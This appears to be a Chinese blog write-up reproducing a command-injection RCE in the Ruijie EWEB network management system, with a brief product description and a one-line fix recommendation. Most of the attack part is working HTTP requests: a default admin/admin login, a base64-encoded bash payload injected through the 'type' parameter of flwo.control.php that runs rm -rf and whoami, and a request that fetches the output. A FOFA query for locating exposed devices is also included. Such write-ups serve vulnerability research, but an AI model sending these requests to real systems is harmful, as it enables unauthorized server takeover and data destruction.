锐捷EWEB网管系统 RCE漏洞复现

0x01 产品简介

锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以"数据时代创新网管与信息安全"为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。

0x02 漏洞概述

Ruijie-EWEB 网管系统 flwo.control.php 中的 type 参数存在命令执行漏洞,攻击者可利用该漏洞执行任意命令,写入后门,获取服务器权限,进而控制整个web服务器。

0x03 复现环境

FOFA:app="Ruijie-EWEB网管系统"

0x04 漏洞复现

获取admin用户有效cookie

复制代码
POST /ddi/server/login.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

username=admin&password=admin?

携带cookie执行命令并将结果写进txt文件, 命令需要base64编码

复制代码
POST /flow_control_pi/flwo.control.php?a=getFlowGroup HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Cookie: your-cookie user=admin;
Accept-Encoding: gzip
Connection: close

type=%7Cbash+-c+%27echo+cm0gLXJmIC4uL2EudHh0ICYmIHJtIC1yZiAuLi9hLnR4dCAmJiB3aG9hbWkgPiAuLi9hLnR4dCAyPiYxID4gLi4vYS50eHQgMj4mMQ%3D%3D+%7C+base64+-d+%7C+bash+%26%26+exit+0%27

验证

复制代码
GET /a.txt HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

0x05 修复建议

请及时关注厂商官网,并更新最新系统:https://www.ruijie.com.cn/

相关推荐
Clownseven2 小时前
云端备份与恢复策略:企业如何选择最安全的备份解决方案
安全
qq_171538852 小时前
TCP/IP协议精解:IP协议——互联网世界的邮政编码系统
网络·网络协议·tcp/ip
珹洺2 小时前
计算机网络:(七)网络层(上)网络层中重要的概念与网际协议 IP
网络·tcp/ip·计算机网络
兮动人3 小时前
获取终端外网IP地址
java·网络·网络协议·tcp/ip·获取终端外网ip地址
怦然星动_3 小时前
eNSP中实现vlan间路由通信(路由器)
网络·智能路由器
薄荷椰果抹茶4 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全
zyx没烦恼5 小时前
TCP相关实验
服务器·网络·tcp/ip
HumanRisk11 小时前
降低网络安全中的人为风险:以人为本的路径
网络·安全·web安全
运维开发王义杰12 小时前
金融安全生命线:用AWS EventBridge和CloudTrail构建主动式入侵检测系统
安全·金融·aws
安全系统学习14 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss